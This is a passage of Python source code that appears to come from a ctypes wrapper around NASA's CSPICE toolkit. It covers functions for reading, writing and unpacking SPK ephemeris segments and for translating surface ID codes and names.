    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkpds_c.html
    :param body: The NAIF ID code for the body of the segment.
    :type body: int
    :param center: The center of motion for body.
    :type center: int
    :param framestr: The frame for this segment.
    :type framestr: str
    :param typenum: The type of SPK segment to create.
    :type typenum: int
    :param first: The first epoch for which the segment is valid.
    :type first: float
    :param last: The last epoch for which the segment is valid.
    :type last: float
    :return: An SPK segment descriptor.
    :rtype: 5-Element Array of floats
    """
    # SPK descriptors are packed into a fixed 5-element double array.
    descr = stypes.emptyDoubleVector(5)
    libspice.spkpds_c(ctypes.c_int(body), ctypes.c_int(center),
                      stypes.stringToCharP(framestr), ctypes.c_int(typenum),
                      ctypes.c_double(first), ctypes.c_double(last), descr)
    return stypes.cVectorToPython(descr)
@spiceErrorCheck
def spkpos(targ, et, ref, abcorr, obs):
    """
    Return the position of a target body relative to an observing
    body, optionally corrected for light time (planetary aberration)
    and stellar aberration.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkpos_c.html
    :param targ: Target body name.
    :type targ: str
    :param et: Observer epoch.
    :type et: Union[float,Iterable[float]]
    :param ref: Reference frame of output position vector.
    :type ref: str
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :param obs: Observing body name.
    :type obs: str
    :return:
            Position of target,
            One way light time between observer and target.
    :rtype: tuple
    """
    targ = stypes.stringToCharP(targ)
    ref = stypes.stringToCharP(ref)
    abcorr = stypes.stringToCharP(abcorr)
    obs = stypes.stringToCharP(obs)
    ptarg = stypes.emptyDoubleVector(3)
    lt = ctypes.c_double()
    if hasattr(et, "__iter__"):
        ptargs = []
        lts = []
        for t in et:
            # Wrap each epoch explicitly in c_double, matching spkezr;
            # previously the raw Python value was passed through.
            libspice.spkpos_c(targ, ctypes.c_double(t), ref, abcorr, obs,
                              ptarg, ctypes.byref(lt))
            checkForSpiceError(None)
            ptargs.append(stypes.cVectorToPython(ptarg))
            lts.append(lt.value)
        return ptargs, lts
    else:
        libspice.spkpos_c(targ, ctypes.c_double(et), ref, abcorr, obs,
                          ptarg, ctypes.byref(lt))
        return stypes.cVectorToPython(ptarg), lt.value
@spiceErrorCheck
def spkpvn(handle, descr, et):
    """
    For a specified SPK segment and time, return the state (position and
    velocity) of the segment's target body relative to its center of
    motion.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkpvn_c.html
    :param handle: File handle.
    :type handle: int
    :param descr: Segment descriptor.
    :type descr: 5-Element Array of floats
    :param et: Evaluation epoch.
    :type et: float
    :return:
            Segment reference frame ID code,
            Output state vector,
            Center of state.
    :rtype: tuple
    """
    # Outputs written back by CSPICE.
    ref = ctypes.c_int()
    state = stypes.emptyDoubleVector(6)
    center = ctypes.c_int()
    libspice.spkpvn_c(ctypes.c_int(handle), stypes.toDoubleVector(descr),
                      ctypes.c_double(et), ctypes.byref(ref), state,
                      ctypes.byref(center))
    return ref.value, stypes.cVectorToPython(state), center.value
@spiceErrorCheck
@spiceFoundExceptionThrower
def spksfs(body, et, idlen):
    # spksfs has a Parameter SIDLEN,
    # sounds like an optional but is that possible?
    """
    Search through loaded SPK files to find the highest-priority segment
    applicable to the body and time specified.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spksfs_c.html
    :param body: Body ID.
    :type body: int
    :param et: Ephemeris time.
    :type et: float
    :param idlen: Length of output segment ID string.
    :type idlen: int
    :return:
            Handle of file containing the applicable segment,
            Descriptor of the applicable segment,
            Identifier of the applicable segment.
    :rtype: tuple
    """
    idlen = ctypes.c_int(idlen)
    # Output slots: file handle, 5-double descriptor, segment ID buffer,
    # and the found flag consumed by the decorator.
    handle = ctypes.c_int()
    descr = stypes.emptyDoubleVector(5)
    identstring = stypes.stringToCharP(idlen)
    found = ctypes.c_int()
    libspice.spksfs_c(ctypes.c_int(body), ctypes.c_double(et), idlen,
                      ctypes.byref(handle), descr, identstring,
                      ctypes.byref(found))
    return (handle.value, stypes.cVectorToPython(descr),
            stypes.toPythonString(identstring), bool(found.value))
@spiceErrorCheck
def spkssb(targ, et, ref):
    """
    Return the state (position and velocity) of a target body
    relative to the solar system barycenter.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkssb_c.html
    :param targ: Target body.
    :type targ: int
    :param et: Target epoch.
    :type et: float
    :param ref: Target reference frame.
    :type ref: str
    :return: State of target.
    :rtype: 6-Element Array of floats
    """
    starg = stypes.emptyDoubleVector(6)
    libspice.spkssb_c(ctypes.c_int(targ), ctypes.c_double(et),
                      stypes.stringToCharP(ref), starg)
    return stypes.cVectorToPython(starg)
@spiceErrorCheck
def spksub(handle, descr, identin, begin, end, newh):
    """
    Extract a subset of the data in an SPK segment into a
    separate segment.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spksub_c.html
    :param handle: Handle of source segment.
    :type handle: int
    :param descr: Descriptor of source segment.
    :type descr: 5-Element Array of floats
    :param identin: Identifier of source segment.
    :type identin: str
    :param begin: Beginning (initial epoch) of subset.
    :type begin: float
    :param end: End (final epoch) of subset.
    :type end: float
    :param newh: Handle of new segment.
    :type newh: int
    """
    # Use == for value comparison; "is" on an int literal relies on
    # CPython's small-int cache and raises a SyntaxWarning on 3.8+.
    assert len(descr) == 5
    handle = ctypes.c_int(handle)
    descr = stypes.toDoubleVector(descr)
    identin = stypes.stringToCharP(identin)
    begin = ctypes.c_double(begin)
    end = ctypes.c_double(end)
    newh = ctypes.c_int(newh)
    libspice.spksub_c(handle, descr, identin, begin, end, newh)
@spiceErrorCheck
def spkuds(descr):
    """
    Unpack the contents of an SPK segment descriptor.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkuds_c.html
    :param descr: An SPK segment descriptor.
    :type descr: 5-Element Array of floats
    :return:
            The NAIF ID code for the body of the segment,
            The center of motion for body,
            The ID code for the frame of this segment,
            The type of SPK segment,
            The first epoch for which the segment is valid,
            The last epoch for which the segment is valid,
            Beginning DAF address of the segment,
            Ending DAF address of the segment.
    :rtype: tuple
    """
    # Use == for value comparison; "is" on an int literal relies on
    # CPython's small-int cache and raises a SyntaxWarning on 3.8+.
    assert len(descr) == 5
    descr = stypes.toDoubleVector(descr)
    body = ctypes.c_int()
    center = ctypes.c_int()
    framenum = ctypes.c_int()
    typenum = ctypes.c_int()
    first = ctypes.c_double()
    last = ctypes.c_double()
    begin = ctypes.c_int()
    end = ctypes.c_int()
    libspice.spkuds_c(descr, ctypes.byref(body), ctypes.byref(center),
                      ctypes.byref(framenum), ctypes.byref(typenum),
                      ctypes.byref(first), ctypes.byref(last),
                      ctypes.byref(begin), ctypes.byref(end))
    return body.value, center.value, framenum.value, typenum.value, \
           first.value, last.value, begin.value, end.value
@spiceErrorCheck
def spkuef(handle):
    """
    Unload an ephemeris file so that it will no longer be searched by
    the readers.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkuef_c.html
    :param handle: Handle of file to be unloaded
    :type handle: int
    """
    libspice.spkuef_c(ctypes.c_int(handle))
@spiceErrorCheck
def spkw02(handle, body, center, inframe, first, last, segid, intlen, n, polydg,
           cdata, btime):
    """
    Write a type 2 segment to an SPK file.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw02_c.html
    :param handle: Handle of an SPK file open for writing.
    :type handle: int
    :param body: Body code for ephemeris object.
    :type body: int
    :param center: Body code for the center of motion of the body.
    :type center: int
    :param inframe: The reference frame of the states.
    :type inframe: str
    :param first: First valid time for which states can be computed.
    :type first: float
    :param last: Last valid time for which states can be computed.
    :type last: float
    :param segid: Segment identifier.
    :type segid: str
    :param intlen: Length of time covered by logical record.
    :type intlen: float
    :param n: Number of coefficient sets.
    :type n: int
    :param polydg: Chebyshev polynomial degree.
    :type polydg: int
    :param cdata: Array of Chebyshev coefficients.
    :type cdata: Array of floats
    :param btime: Begin time of first logical record.
    :type btime: float
    """
    # Convert every argument to its C representation at the call site.
    libspice.spkw02_c(ctypes.c_int(handle), ctypes.c_int(body),
                      ctypes.c_int(center), stypes.stringToCharP(inframe),
                      ctypes.c_double(first), ctypes.c_double(last),
                      stypes.stringToCharP(segid), ctypes.c_double(intlen),
                      ctypes.c_int(n), ctypes.c_int(polydg),
                      stypes.toDoubleVector(cdata), ctypes.c_double(btime))
@spiceErrorCheck
def spkw03(handle, body, center, inframe, first, last, segid, intlen, n, polydg,
           cdata, btime):
    """
    Write a type 3 segment to an SPK file.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw03_c.html
    :param handle: Handle of SPK file open for writing.
    :type handle: int
    :param body: NAIF code for ephemeris object.
    :type body: int
    :param center: NAIF code for the center of motion of the body.
    :type center: int
    :param inframe: Reference frame name.
    :type inframe: str
    :param first: Start time of interval covered by segment.
    :type first: float
    :param last: End time of interval covered by segment.
    :type last: float
    :param segid: Segment identifier.
    :type segid: str
    :param intlen: Length of time covered by record.
    :type intlen: float
    :param n: Number of records in segment.
    :type n: int
    :param polydg: Chebyshev polynomial degree.
    :type polydg: int
    :param cdata: Array of Chebyshev coefficients.
    :type cdata: Array of floats
    :param btime: Begin time of first record.
    :type btime: float
    """
    # Convert every argument to its C representation at the call site.
    libspice.spkw03_c(ctypes.c_int(handle), ctypes.c_int(body),
                      ctypes.c_int(center), stypes.stringToCharP(inframe),
                      ctypes.c_double(first), ctypes.c_double(last),
                      stypes.stringToCharP(segid), ctypes.c_double(intlen),
                      ctypes.c_int(n), ctypes.c_int(polydg),
                      stypes.toDoubleVector(cdata), ctypes.c_double(btime))
@spiceErrorCheck
def spkw05(handle, body, center, inframe, first, last, segid, gm, n, states,
           epochs):
    # see libspice args for solution to array[][N] problem
    """
    Write an SPK segment of type 5 given a time-ordered set of
    discrete states and epochs, and the gravitational parameter
    of a central body.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw05_c.html
    :param handle: Handle of an SPK file open for writing.
    :type handle: int
    :param body: Body code for ephemeris object.
    :type body: int
    :param center: Body code for the center of motion of the body.
    :type center: int
    :param inframe: The reference frame of the states.
    :type inframe: str
    :param first: First valid time for which states can be computed.
    :type first: float
    :param last: Last valid time for which states can be computed.
    :type last: float
    :param segid: Segment identifier.
    :type segid: str
    :param gm: Gravitational parameter of central body.
    :type gm: float
    :param n: Number of states and epochs.
    :type n: int
    :param states: States.
    :type states: Nx6-Element Array of floats
    :param epochs: Epochs.
    :type epochs: Array of floats
    """
    # Convert every argument to its C representation at the call site.
    libspice.spkw05_c(ctypes.c_int(handle), ctypes.c_int(body),
                      ctypes.c_int(center), stypes.stringToCharP(inframe),
                      ctypes.c_double(first), ctypes.c_double(last),
                      stypes.stringToCharP(segid), ctypes.c_double(gm),
                      ctypes.c_int(n), stypes.toDoubleMatrix(states),
                      stypes.toDoubleVector(epochs))
@spiceErrorCheck
def spkw08(handle, body, center, inframe, first, last, segid, degree, n, states,
           epoch1, step):
    # see libspice args for solution to array[][N] problem
    """
    Write a type 8 segment to an SPK file.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw08_c.html
    :param handle: Handle of an SPK file open for writing.
    :type handle: int
    :param body: NAIF code for an ephemeris object.
    :type body: int
    :param center: NAIF code for center of motion of "body".
    :type center: int
    :param inframe: Reference frame name.
    :type inframe: str
    :param first: Start time of interval covered by segment.
    :type first: float
    :param last: End time of interval covered by segment.
    :type last: float
    :param segid: Segment identifier.
    :type segid: str
    :param degree: Degree of interpolating polynomials.
    :type degree: int
    :param n: Number of states.
    :type n: int
    :param states: Array of states.
    :type states: Nx6-Element Array of floats
    :param epoch1: Epoch of first state in states array.
    :type epoch1: float
    :param step: Time step separating epochs of states.
    :type step: float
    """
    # Convert every argument to its C representation at the call site;
    # states is flattened to an N x 6 double matrix.
    libspice.spkw08_c(ctypes.c_int(handle), ctypes.c_int(body),
                      ctypes.c_int(center), stypes.stringToCharP(inframe),
                      ctypes.c_double(first), ctypes.c_double(last),
                      stypes.stringToCharP(segid), ctypes.c_int(degree),
                      ctypes.c_int(n), stypes.toDoubleMatrix(states),
                      ctypes.c_double(epoch1), ctypes.c_double(step))
@spiceErrorCheck
def spkw09(handle, body, center, inframe, first, last, segid, degree, n, states,
           epochs):
    """
    Write a type 9 segment to an SPK file.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw09_c.html
    :param handle: Handle of an SPK file open for writing.
    :type handle: int
    :param body: NAIF code for an ephemeris object.
    :type body: int
    :param center: NAIF code for center of motion of "body".
    :type center: int
    :param inframe: Reference frame name.
    :type inframe: str
    :param first: Start time of interval covered by segment.
    :type first: float
    :param last: End time of interval covered by segment.
    :type last: float
    :param segid: Segment identifier.
    :type segid: str
    :param degree: Degree of interpolating polynomials.
    :type degree: int
    :param n: Number of states.
    :type n: int
    :param states: Array of states.
    :type states: Nx6-Element Array of floats
    :param epochs: Array of epochs corresponding to states.
    :type epochs: Array of floats
    """
    # Convert every argument to its C representation at the call site;
    # states is flattened to an N x 6 double matrix.
    libspice.spkw09_c(ctypes.c_int(handle), ctypes.c_int(body),
                      ctypes.c_int(center), stypes.stringToCharP(inframe),
                      ctypes.c_double(first), ctypes.c_double(last),
                      stypes.stringToCharP(segid), ctypes.c_int(degree),
                      ctypes.c_int(n), stypes.toDoubleMatrix(states),
                      stypes.toDoubleVector(epochs))
@spiceErrorCheck
def spkw10(handle, body, center, inframe, first, last, segid, consts, n, elems,
           epochs):
    """
    Write an SPK type 10 segment to the DAF open and attached to
    the input handle.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw10_c.html
    :param handle: The handle of a DAF file open for writing.
    :type handle: int
    :param body: The NAIF ID code for the body of the segment.
    :type body: int
    :param center: The center of motion for body.
    :type center: int
    :param inframe: The reference frame for this segment.
    :type inframe: str
    :param first: The first epoch for which the segment is valid.
    :type first: float
    :param last: The last epoch for which the segment is valid.
    :type last: float
    :param segid: The string to use for segment identifier.
    :type segid: str
    :param consts: The array of geophysical constants for the segment.
    :type consts: 8-Element Array of floats
    :param n: The number of element/epoch pairs to be stored.
    :type n: int
    :param elems: The collection of "two-line" element sets.
    :type elems: Array of floats
    :param epochs: The epochs associated with the element sets.
    :type epochs: Array of floats
    """
    # Convert every argument to its C representation at the call site.
    libspice.spkw10_c(ctypes.c_int(handle), ctypes.c_int(body),
                      ctypes.c_int(center), stypes.stringToCharP(inframe),
                      ctypes.c_double(first), ctypes.c_double(last),
                      stypes.stringToCharP(segid),
                      stypes.toDoubleVector(consts), ctypes.c_int(n),
                      stypes.toDoubleVector(elems),
                      stypes.toDoubleVector(epochs))
@spiceErrorCheck
def spkw12(handle, body, center, inframe, first, last, segid, degree, n, states,
           epoch0, step):
    """
    Write a type 12 segment to an SPK file.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw12_c.html
    :param handle: Handle of an SPK file open for writing.
    :type handle: int
    :param body: NAIF code for an ephemeris object.
    :type body: int
    :param center: NAIF code for center of motion of body.
    :type center: int
    :param inframe: Reference frame name.
    :type inframe: str
    :param first: Start time of interval covered by segment.
    :type first: float
    :param last: End time of interval covered by segment.
    :type last: float
    :param segid: Segment identifier.
    :type segid: str
    :param degree: Degree of interpolating polynomials.
    :type degree: int
    :param n: Number of states.
    :type n: int
    :param states: Array of states.
    :type states: Nx6-Element Array of floats
    :param epoch0: Epoch of first state in states array.
    :type epoch0: float
    :param step: Time step separating epochs of states.
    :type step: float
    """
    # Convert every argument to its C representation at the call site;
    # states is flattened to an N x 6 double matrix.
    libspice.spkw12_c(ctypes.c_int(handle), ctypes.c_int(body),
                      ctypes.c_int(center), stypes.stringToCharP(inframe),
                      ctypes.c_double(first), ctypes.c_double(last),
                      stypes.stringToCharP(segid), ctypes.c_int(degree),
                      ctypes.c_int(n), stypes.toDoubleMatrix(states),
                      ctypes.c_double(epoch0), ctypes.c_double(step))
@spiceErrorCheck
def spkw13(handle, body, center, inframe, first, last, segid, degree, n, states,
           epochs):
    """
    Write a type 13 segment to an SPK file.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw13_c.html
    :param handle: Handle of an SPK file open for writing.
    :type handle: int
    :param body: NAIF code for an ephemeris object.
    :type body: int
    :param center: NAIF code for center of motion of body.
    :type center: int
    :param inframe: Reference frame name.
    :type inframe: str
    :param first: Start time of interval covered by segment.
    :type first: float
    :param last: End time of interval covered by segment.
    :type last: float
    :param segid: Segment identifier.
    :type segid: str
    :param degree: Degree of interpolating polynomials.
    :type degree: int
    :param n: Number of states.
    :type n: int
    :param states: Array of states.
    :type states: Nx6-Element Array of floats
    :param epochs: Array of epochs corresponding to states.
    :type epochs: Array of floats
    """
    # Convert every argument to its C representation at the call site;
    # states is flattened to an N x 6 double matrix.
    libspice.spkw13_c(ctypes.c_int(handle), ctypes.c_int(body),
                      ctypes.c_int(center), stypes.stringToCharP(inframe),
                      ctypes.c_double(first), ctypes.c_double(last),
                      stypes.stringToCharP(segid), ctypes.c_int(degree),
                      ctypes.c_int(n), stypes.toDoubleMatrix(states),
                      stypes.toDoubleVector(epochs))
@spiceErrorCheck
def spkw15(handle, body, center, inframe, first, last, segid, epoch, tp, pa, p,
           ecc, j2flg, pv, gm, j2, radius):
    """
    Write an SPK segment of type 15 given a type 15 data record.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw15_c.html
    :param handle: Handle of an SPK file open for writing.
    :type handle: int
    :param body: Body code for ephemeris object.
    :type body: int
    :param center: Body code for the center of motion of the body.
    :type center: int
    :param inframe: The reference frame of the states.
    :type inframe: str
    :param first: First valid time for which states can be computed.
    :type first: float
    :param last: Last valid time for which states can be computed.
    :type last: float
    :param segid: Segment identifier.
    :type segid: str
    :param epoch: Epoch of the periapse.
    :type epoch: float
    :param tp: Trajectory pole vector.
    :type tp: 3-Element Array of floats
    :param pa: Periapsis vector.
    :type pa: 3-Element Array of floats
    :param p: Semi-latus rectum.
    :type p: float
    :param ecc: Eccentricity.
    :type ecc: float
    :param j2flg: J2 processing flag.
    :type j2flg: float
    :param pv: Central body pole vector.
    :type pv: 3-Element Array of floats
    :param gm: Central body GM.
    :type gm: float
    :param j2: Central body J2.
    :type j2: float
    :param radius: Equatorial radius of central body.
    :type radius: float
    """
    # Convert every argument to its C representation at the call site.
    libspice.spkw15_c(ctypes.c_int(handle), ctypes.c_int(body),
                      ctypes.c_int(center), stypes.stringToCharP(inframe),
                      ctypes.c_double(first), ctypes.c_double(last),
                      stypes.stringToCharP(segid), ctypes.c_double(epoch),
                      stypes.toDoubleVector(tp), stypes.toDoubleVector(pa),
                      ctypes.c_double(p), ctypes.c_double(ecc),
                      ctypes.c_double(j2flg), stypes.toDoubleVector(pv),
                      ctypes.c_double(gm), ctypes.c_double(j2),
                      ctypes.c_double(radius))
@spiceErrorCheck
def spkw17(handle, body, center, inframe, first, last, segid, epoch, eqel,
           rapol, decpol):
    """
    Write an SPK segment of type 17 given a type 17 data record.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw17_c.html
    :param handle: Handle of an SPK file open for writing.
    :type handle: int
    :param body: Body code for ephemeris object.
    :type body: int
    :param center: Body code for the center of motion of the body.
    :type center: int
    :param inframe: The reference frame of the states.
    :type inframe: str
    :param first: First valid time for which states can be computed.
    :type first: float
    :param last: Last valid time for which states can be computed.
    :type last: float
    :param segid: Segment identifier.
    :type segid: str
    :param epoch: Epoch of elements in seconds past J2000.
    :type epoch: float
    :param eqel: Array of equinoctial elements.
    :type eqel: 9-Element Array of floats
    :param rapol: Right Ascension of the pole of the reference plane.
    :type rapol: float
    :param decpol: Declination of the pole of the reference plane.
    :type decpol: float
    """
    # Convert every argument to its C representation at the call site.
    libspice.spkw17_c(ctypes.c_int(handle), ctypes.c_int(body),
                      ctypes.c_int(center), stypes.stringToCharP(inframe),
                      ctypes.c_double(first), ctypes.c_double(last),
                      stypes.stringToCharP(segid), ctypes.c_double(epoch),
                      stypes.toDoubleVector(eqel), ctypes.c_double(rapol),
                      ctypes.c_double(decpol))
@spiceErrorCheck
def spkw18(handle, subtyp, body, center, inframe, first, last, segid, degree, packts, epochs):
    """
    Write a type 18 segment to an SPK file.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw18_c.html

    :param handle: Handle of an SPK file open for writing.
    :type handle: int
    :param subtyp: SPK type 18 subtype code.
    :type subtyp: int
    :param body: Body code for ephemeris object.
    :type body: int
    :param center: Body code for the center of motion of the body.
    :type center: int
    :param inframe: The reference frame of the states.
    :type inframe: str
    :param first: First valid time for which states can be computed.
    :type first: float
    :param last: Last valid time for which states can be computed.
    :type last: float
    :param segid: Segment identifier.
    :type segid: str
    :param degree: Degree of interpolating polynomials.
    :type degree: int
    :param packts: data packets
    :type packts: 2D Array of floats
    :param epochs: Array of epochs corresponding to states.
    :type epochs: N-Element Array of floats
    """
    # Record count must be taken from the Python object before it is
    # converted into a ctypes matrix.
    c_n = ctypes.c_int(len(packts))
    c_handle = ctypes.c_int(handle)
    c_subtyp = ctypes.c_int(subtyp)
    c_body = ctypes.c_int(body)
    c_center = ctypes.c_int(center)
    c_inframe = stypes.stringToCharP(inframe)
    c_first = ctypes.c_double(first)
    c_last = ctypes.c_double(last)
    c_segid = stypes.stringToCharP(segid)
    c_degree = ctypes.c_int(degree)
    c_packts = stypes.toDoubleMatrix(packts)
    c_epochs = stypes.toDoubleVector(epochs)
    libspice.spkw18_c(c_handle, c_subtyp, c_body, c_center, c_inframe, c_first,
                      c_last, c_segid, c_degree, c_n, c_packts, c_epochs)
@spiceErrorCheck
def spkw20(handle, body, center, inframe, first, last, segid, intlen, n, polydg, cdata, dscale, tscale, initjd, initfr):
    """
    Write a type 20 segment to an SPK file.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/spkw20_c.html

    :param handle: Handle of an SPK file open for writing.
    :type handle: int
    :param body: Body code for ephemeris object.
    :type body: int
    :param center: Body code for the center of motion of the body.
    :type center: int
    :param inframe: The reference frame of the states.
    :type inframe: str
    :param first: First valid time for which states can be computed.
    :type first: float
    :param last: Last valid time for which states can be computed.
    :type last: float
    :param segid: Segment identifier.
    :type segid: str
    :param intlen: Length of time covered by logical record (days).
    :param n: Number of logical records in segment.
    :param polydg: Chebyshev polynomial degree.
    :param cdata: Array of Chebyshev coefficients and positions.
    :param dscale: Distance scale of data.
    :param tscale: Time scale of data.
    :param initjd: Integer part of begin time (TDB Julian date) of first record.
    :param initfr: Fractional part of begin time (TDB Julian date) of first record.
    """
    # Convert all arguments to ctypes form and hand off to CSPICE.
    c_handle = ctypes.c_int(handle)
    c_body = ctypes.c_int(body)
    c_center = ctypes.c_int(center)
    c_inframe = stypes.stringToCharP(inframe)
    c_first = ctypes.c_double(first)
    c_last = ctypes.c_double(last)
    c_segid = stypes.stringToCharP(segid)
    c_intlen = ctypes.c_double(intlen)
    c_n = ctypes.c_int(n)
    c_polydg = ctypes.c_int(polydg)
    c_cdata = stypes.toDoubleVector(cdata)
    c_dscale = ctypes.c_double(dscale)
    c_tscale = ctypes.c_double(tscale)
    c_initjd = ctypes.c_double(initjd)
    c_initfr = ctypes.c_double(initfr)
    libspice.spkw20_c(c_handle, c_body, c_center, c_inframe, c_first, c_last,
                      c_segid, c_intlen, c_n, c_polydg, c_cdata, c_dscale,
                      c_tscale, c_initjd, c_initfr)
@spiceErrorCheck
@spiceFoundExceptionThrower
def srfc2s(code, bodyid, srflen=_default_len_out):
    """
    Translate a surface ID code, together with a body ID code, to the
    corresponding surface name. If no such name exists, return a
    string representation of the surface ID code.

    note: from NAIF if isname is false, this case is not treated as an error.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/srfc2s_c.html

    :param code: Integer surface ID code to translate to a string.
    :type code: int
    :param bodyid: ID code of body associated with surface.
    :type bodyid: int
    :param srflen: Available space in output string.
    :type srflen: int
    :return: String corresponding to surface ID code.
    :rtype: str
    """
    code = ctypes.c_int(code)
    bodyid = ctypes.c_int(bodyid)
    # Allocate the output buffer from srflen before srflen itself is
    # converted to a ctypes int.
    srfstr = stypes.stringToCharP(srflen)
    srflen = ctypes.c_int(srflen)
    isname = ctypes.c_int()
    libspice.srfc2s_c(code, bodyid, srflen, srfstr, ctypes.byref(isname))
    return stypes.toPythonString(srfstr), bool(isname.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def srfcss(code, bodstr, srflen=_default_len_out):
    """
    Translate a surface ID code, together with a body string, to the
    corresponding surface name. If no such surface name exists,
    return a string representation of the surface ID code.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/srfcss_c.html

    :param code: Integer surface ID code to translate to a string.
    :type code: int
    :param bodstr: Name or ID of body associated with surface.
    :type bodstr: str
    :param srflen: Available space in output string.
    :type srflen: int
    :return: String corresponding to surface ID code.
    :rtype: str
    """
    code = ctypes.c_int(code)
    bodstr = stypes.stringToCharP(bodstr)
    # Allocate the output buffer from srflen before srflen itself is
    # converted to a ctypes int.
    srfstr = stypes.stringToCharP(srflen)
    srflen = ctypes.c_int(srflen)
    isname = ctypes.c_int()
    libspice.srfcss_c(code, bodstr, srflen, srfstr, ctypes.byref(isname))
    return stypes.toPythonString(srfstr), bool(isname.value)
@spiceErrorCheck
def srfnrm(method, target, et, fixref, srfpts):
    """
    Map array of surface points on a specified target body to
    the corresponding unit length outward surface normal vectors.

    The surface of the target body may be represented by a triaxial
    ellipsoid or by topographic data provided by DSK files.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/srfnrm_c.html

    :param method: Computation method.
    :type method: str
    :param target: Name of target body.
    :type target: str
    :param et: Epoch in TDB seconds past J2000 TDB.
    :type et: float
    :param fixref: Body-fixed, body-centered target body frame.
    :type fixref: str
    :param srfpts: Array of surface points.
    :type srfpts: 3xM-Element Array of floats
    :return: Array of outward, unit length normal vectors.
    :rtype: 3xM-Element Array of floats
    """
    # Count the points before srfpts is replaced by its ctypes matrix.
    c_npts = ctypes.c_int(len(srfpts))
    c_method = stypes.stringToCharP(method)
    c_target = stypes.stringToCharP(target)
    c_et = ctypes.c_double(et)
    c_fixref = stypes.stringToCharP(fixref)
    c_srfpts = stypes.toDoubleMatrix(srfpts)
    # One output normal per input surface point.
    normls = stypes.emptyDoubleMatrix(3, c_npts.value)
    libspice.srfnrm_c(c_method, c_target, c_et, c_fixref, c_npts, c_srfpts,
                      normls)
    return stypes.cMatrixToNumpy(normls)
@spiceErrorCheck
def srfrec(body, longitude, latitude):
    """
    Convert planetocentric latitude and longitude of a surface
    point on a specified body to rectangular coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/srfrec_c.html

    :param body: NAIF integer code of an extended body.
    :type body: int
    :param longitude: Longitude of point in radians.
    :type longitude: float
    :param latitude: Latitude of point in radians.
    :type latitude: float
    :return: Rectangular coordinates of the point.
    :rtype: 3-Element Array of floats
    """
    c_body = ctypes.c_int(body)
    c_lon = ctypes.c_double(longitude)
    c_lat = ctypes.c_double(latitude)
    # Output buffer for the x/y/z coordinates.
    rectan = stypes.emptyDoubleVector(3)
    libspice.srfrec_c(c_body, c_lon, c_lat, rectan)
    return stypes.cVectorToPython(rectan)
@spiceErrorCheck
@spiceFoundExceptionThrower
def srfs2c(srfstr, bodstr):
    """
    Translate a surface string, together with a body string, to the
    corresponding surface ID code. The input strings may contain
    names or integer ID codes.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/srfs2c_c.html

    :param srfstr: Surface name or ID string.
    :type srfstr: str
    :param bodstr: Body name or ID string.
    :type bodstr: str
    :return: Integer surface ID code.
    :rtype: int
    """
    c_srfstr = stypes.stringToCharP(srfstr)
    c_bodstr = stypes.stringToCharP(bodstr)
    # Outputs: the translated code and a "was it a name" flag consumed
    # by the found-exception decorator.
    code = ctypes.c_int()
    isname = ctypes.c_int()
    libspice.srfs2c_c(c_srfstr, c_bodstr, ctypes.byref(code),
                      ctypes.byref(isname))
    return code.value, bool(isname.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def srfscc(srfstr, bodyid):
    """
    Translate a surface string, together with a body ID code, to the
    corresponding surface ID code. The input surface string may
    contain a name or an integer ID code.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/srfscc_c.html

    :param srfstr: Surface name or ID string.
    :type srfstr: str
    :param bodyid: ID code of body associated with surface.
    :type bodyid: int
    :return: Integer surface ID code.
    :rtype: int
    """
    c_srfstr = stypes.stringToCharP(srfstr)
    c_bodyid = ctypes.c_int(bodyid)
    # Outputs: the translated code and a "was it a name" flag consumed
    # by the found-exception decorator.
    code = ctypes.c_int()
    isname = ctypes.c_int()
    libspice.srfscc_c(c_srfstr, c_bodyid, ctypes.byref(code),
                      ctypes.byref(isname))
    return code.value, bool(isname.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def srfxpt(method, target, et, abcorr, obsrvr, dref, dvec):
    """
    Deprecated: This routine has been superseded by the CSPICE
    routine :func:`sincpt`. This routine is supported for purposes of
    backward compatibility only.

    Given an observer and a direction vector defining a ray, compute the
    surface intercept point of the ray on a target body at a specified
    epoch, optionally corrected for light time and stellar aberration.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/srfxpt_c.html

    :param method: Computation method.
    :type method: str
    :param target: Name of target body.
    :type target: str
    :param et: Epoch in ephemeris seconds past J2000 TDB.
    :type et: Union[float,Iterable[float]]
    :param abcorr: Aberration correction.
    :type abcorr: str
    :param obsrvr: Name of observing body.
    :type obsrvr: str
    :param dref: Reference frame of input direction vector.
    :type dref: str
    :param dvec: Ray's direction vector.
